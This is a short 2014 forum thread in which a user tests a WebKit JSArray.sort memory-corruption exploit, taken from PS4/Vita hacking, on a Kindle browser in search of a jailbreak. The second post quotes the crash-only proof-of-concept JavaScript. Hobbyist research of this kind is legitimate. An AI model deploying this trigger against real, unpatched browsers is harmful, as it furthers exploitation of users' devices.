Register Guidelines E-Books Search Today's Posts Mark Forums Read

Go Back   MobileRead Forums > E-Book Readers > Amazon Kindle > Kindle Developer's Corner

Notices

Reply
 
Thread Tools Search this Thread
Old 10-27-2014, 06:44 PM   #1
Funeral_Chris
Junior Member
Funeral_Chris began at the beginning.
 
Posts: 2
Karma: 10
Join Date: Oct 2014
Device: KT2
[KT2] remote code exploit in Basic Kindle 2014 / webkit?

Hey guys, I read about the remote code exploit for the PS4 and PS Vita and as the Kindle is using WebKit too (and maybe also an old version of it) I decided to test the exploit.

I pressed "Start" and after a couple of seconds the browser crashed with the following (translated error message):


"Software error

The selected application couldn't be started. Please try it again."


Is this a good sign? Maybe for a jailbreak?
Try it yourself, demo: http://wololo.net/v/260.htm

link to the news: http://wololo.net/2014/10/19/vita-ha...ht-be-a-catch/
link to PS4 exploit: http://wololo.net/2014/10/24/webkit-...firmware-1-76/


Edit:
I did some testing. Calling the vulnerable method JSArray.sort is crashing WebKit. IMHO all Kindle versions with webkit must be affected by that exploit. But how to use it as it is crashing?

Last edited by Funeral_Chris; 10-28-2014 at 04:16 PM. Reason: edit
Funeral_Chris is offline   Reply With Quote
Old 10-28-2014, 04:33 PM   #2
Funeral_Chris
Junior Member
Funeral_Chris began at the beginning.
 
Posts: 2
Karma: 10
Join Date: Oct 2014
Device: KT2
As of now, we "only" have an exploit which is causing the Kindle browser to crash:

Quote:
<script type="text/javascript">
var u32 = new Uint32Array(0x100);
var a1 = [0,1,2,3,u32];
var a2 = [0,1,2,3,4];
var a1len = a1.length;
var a2len = a2.length;
var u32len = u32.length;

var myCompFunc = function(x,y)
{
if (y == 3 && x == u32) {
// shift() is calling during sort(), what causes the
// last array item is written outside the array buffer
a1.shift();
}
return 0;
}

a1.sort(myCompFunc);
</script>
Funeral_Chris is offline   Reply With Quote
 
Advertisement
Reply

Tags
jailbreak, kindle, kt2

Thread Tools Search this Thread
Search this Thread:

Advanced Search

Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
[KT2] (90C6 - usa) Device knc1 Kindle Developer's Corner 2 10-12-2014 08:34 AM
How-to obtain root access of New Basic Kindle (2014) FW5.6.0.1 hondamarlboro Kindle Developer's Corner 20 10-11-2014 04:36 AM
Kindle 3 Webkit Browser toronado Amazon Kindle 3 09-06-2010 03:08 AM
Kindle 3 Webkit browser doesn't start ylsul Amazon Kindle 8 08-28-2010 07:06 PM
Adobe Acrobat subject to remote exploit Alexander Turcic News 3 09-16-2006 06:29 AM


All times are GMT -4. The time now is 11:56 AM.


MobileRead.com is a privately owned, operated and funded community.